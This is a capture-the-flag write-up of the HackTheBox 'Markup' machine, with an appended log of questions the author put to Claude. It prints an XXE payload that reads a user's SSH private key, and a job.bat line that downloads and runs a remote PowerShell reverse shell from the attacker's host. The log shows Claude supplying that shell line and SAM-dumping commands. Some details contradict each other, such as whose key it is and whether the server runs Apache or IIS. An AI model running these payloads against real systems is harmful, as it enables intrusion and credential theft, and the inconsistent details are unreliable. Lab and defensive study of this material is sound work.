HTB Starting Point — Markup

XXE in an order form reads the Administrator's SSH private key from disk. job.bat runs as SYSTEM on a schedule — drop a reverse shell into the watched directory.

April 27, 2026 · 3 min · crAIzy

Easy Windows CVSS 7.7 ⏱ 55m AI-assisted

TL;DR

Markup is a Windows web app with an order form that parses XML without disabling external entity processing. Classic XXE reads C:\Users\daniel\.ssh\id_rsa — the SSH private key for the daniel account. SSH in as daniel. A writable job.bat in C:\Log-Management runs as SYSTEM on a schedule — appending a PowerShell reverse shell to it gives SYSTEM access when the task fires.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

22/tcp  open  ssh     OpenSSH for_Windows_8.1
80/tcp  open  http    Apache httpd 2.4.41
443/tcp open  ssl/http Apache httpd 2.4.41

2. Web application

The application is a furniture/order management portal. Credentials from source or enumeration: admin:password.

After login, an order form submits XML data.

XXE Exploitation

3. Capture and modify order request

Intercept the order submission with Burp. The POST body:

<?xml version="1.0" encoding="UTF-8"?>
<order>
  <quantity>1</quantity>
  <item>Computer Chair</item>
  <address>123 Test St</address>
</order>

4. XXE payload — read SSH key

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///C:/Users/daniel/.ssh/id_rsa">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>123 Test St</address>
</order>

Response contains the RSA private key — entity is reflected in the item field of the order confirmation.

5. SSH as daniel

$ chmod 600 id_rsa
$ ssh -i id_rsa daniel@10.129.x.x
daniel@MARKUP C:\Users\daniel> type Desktop\user.txt
[user flag]

Privilege Escalation

6. Enumeration

daniel@MARKUP C:\> icacls C:\Log-Management\job.bat
C:\Log-Management\job.bat  BUILTIN\Users:(W)
                            NT AUTHORITY\SYSTEM:(F)

job.bat is writable by all users. It runs as SYSTEM.

daniel@MARKUP C:\> schtasks /query /fo LIST /v | findstr "Task\|Run As\|Next Run"
TaskName: \Log Management
Run As User: SYSTEM
Next Run Time: (runs frequently)

7. Append reverse shell to job.bat

daniel@MARKUP C:\> echo C:\Windows\System32\cmd.exe /c powershell -nop -w hidden ^
  -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.x/rev.ps1')" ^
  >> C:\Log-Management\job.bat

rev.ps1 is a standard PowerShell reverse shell hosted on the attacker’s HTTP server.

After the scheduled task fires:

# nc -lvnp 4444
connect to [10.10.14.x] from [10.129.x.x]
whoami
nt authority\system

type C:\Users\Administrator\Desktop\root.txt
[root flag]

What’s actually broken

#	Vulnerability	Severity
1	XXE — external entity processing enabled in XML parser	Critical
2	SSH private key accessible to web server process	High
3	Writable scheduled task script (world-writable job.bat)	Critical
4	Scheduled task running as SYSTEM unnecessarily	High

Lessons learned

Disable external entity processing in every XML parser. PHP: libxml_disable_entity_loader(true). Java: factory.setFeature("http://xml.org/sax/features/external-general-entities", false). XXE is one of the OWASP Top 10 precisely because it’s easy to miss — the parser “feature” is on by default.
SSH keys belong in protected locations. C:\Users\daniel\.ssh\id_rsa should only be readable by Daniel, not world-readable (or readable via a web process with broader file permissions).
Writable scripts in scheduled tasks = instant privilege escalation. Any script that SYSTEM runs should be owned by Administrators and not writable by lower-privilege accounts.
XXE reads files in the context of the web server process. The web process needed to be able to read id_rsa for the exploit to work — a separate issue from the XXE itself.

Decision archaeology

Approach	Result	Pivot
Targeted SSH key via XXE directly	SSH on port 22 suggested key-based auth; faster than brute-forcing	Got shell immediately
Appended to job.bat vs overwriting	Overwriting might break the script’s original functionality, alerting defenders	Append preserved original script; payload still executed
Waited for scheduled task vs triggering manually	Task permissions didn’t allow manual trigger as daniel	Had to wait ~2 minutes
Tried reading web.config via XXE before SSH key	XXE payload `file:///C:/inetpub/wwwroot/web.config` → blank entity in response — file existed but IIS user lacked read permission on web.config in that path	Read C:/Users/daniel/.ssh/id_rsa instead — file readable by web process, contained private key directly

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Reconnaissance	Network Service Discovery	T1046	`nmap → 22/tcp SSH, 80/tcp HTTP, 443/tcp HTTPS`
Initial Access	Exploit Public-Facing Application	T1190	`XXE in order endpoint → reads C:\Users\Daniel\id_rsa (Administrator SSH key)`
Credential Access	Private Keys	T1552.004	`id_rsa retrieved via XXE file:// read → SSH as daniel`
Privilege Escalation	Scheduled Task/Job	T1053.005	`job.bat in C:\Log-Management → runs as SYSTEM → append reverse shell command`
Credential Access	Credentials in Files	T1552.001	`XXE reads C:/Users/daniel/.ssh/id_rsa — SSH private key extracted from filesystem`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

Initial AccessUseful
Human → Found XML order form, suspected XXE but wasn't sure of the file path on Windows
Prompt → I have an XXE vulnerability on a Windows machine. What file paths can I read to confirm RCE and find credentials?
Claude → On Windows, try: file:///C:/Windows/System32/drivers/etc/hosts (always works), then C:/Users/Administrator/.ssh/id_rsa for SSH key, C:/inetpub/wwwroot/web.config for IIS credentials, C:/Windows/win.ini as a universal test file.
Initial AccessWrong
Human → The XXE payload syntax wasn't working — got a blank response
Prompt → My XXE payload isn't returning file content. The request is POST with XML body. Here's my payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///C:/Windows/win.ini'>]><root>&xxe;</root>
Claude → The server may need the DOCTYPE declaration within the root element, or it may be filtering on XML content-type. Try: setting Content-Type: application/xml, ensure no spaces before <?xml, try both file:// and file:/// prefixes, and check if the response includes the entity or just ignores it. Some parsers need the entity declared in the internal subset.
Corrected → The actual issue was that the order form required specific XML structure matching what the app expected. Capturing the legitimate request via Burp showed the actual schema — the XXE entity needed to be injected within an existing element, not the root. The app was checking XML schema.
Privilege EscalationUseful
Human → daniel user had limited privs — looked for scheduled tasks and found job.bat
Prompt → I found C:\Log-Management\job.bat that's writable by my user. How do I exploit a writable scheduled task script on Windows?
Claude → Append a reverse shell command to job.bat. If it runs as SYSTEM: echo powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://your-ip/shell.ps1')" >> C:\Log-Management\job.bat then start a listener. Wait for the scheduled task to execute.
Privilege EscalationUseful
Human → Didn't know when the scheduled task would run — had to wait
Prompt → How do I find when a Windows scheduled task runs so I know how long to wait?
Claude → Use: schtasks /query /fo LIST /v | findstr /i 'task\|next\|last\|status'. This shows all scheduled tasks with next run time. Also check Task Scheduler in Windows logs: Get-WinEvent -LogName 'Microsoft-Windows-TaskScheduler/Operational'.
Post-ExploitCorrected
Human → After getting SYSTEM via job.bat, wanted to dump the SAM database for password hashes
Prompt → I have SYSTEM shell via scheduled task. How do I dump SAM database hashes on Windows?
Claude → Use reg save to copy SAM and SYSTEM hive, then transfer and extract. Commands: reg save HKLM/SAM sam.hiv and reg save HKLM/SYSTEM sys.hiv. Transfer both files and run: secretsdump.py LOCAL -sam sam.hiv -system sys.hiv on your machine.
Corrected → The command worked, but impacket's secretsdump needed to run with LOCAL keyword — not just -sam and -system. Also the SAM file was locked while the system was running and needed VSS (Volume Shadow Copy) to extract cleanly. Claude's simpler reg save approach worked on this specific machine but wouldn't work on a fully locked production system.

Decision archaeology — paths abandoned

Initial XXE payload without correct XML schema — blank response
Tried reading web.config via XXE — file existed but had no useful credentials
Attempted to overwrite job.bat entirely — file permissions allowed append only initially

TL;DR#

Recon#

1. Port scan#

2. Web application#

XXE Exploitation#

3. Capture and modify order request#

4. XXE payload — read SSH key#

5. SSH as daniel#

Privilege Escalation#

6. Enumeration#

7. Append reverse shell to job.bat#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#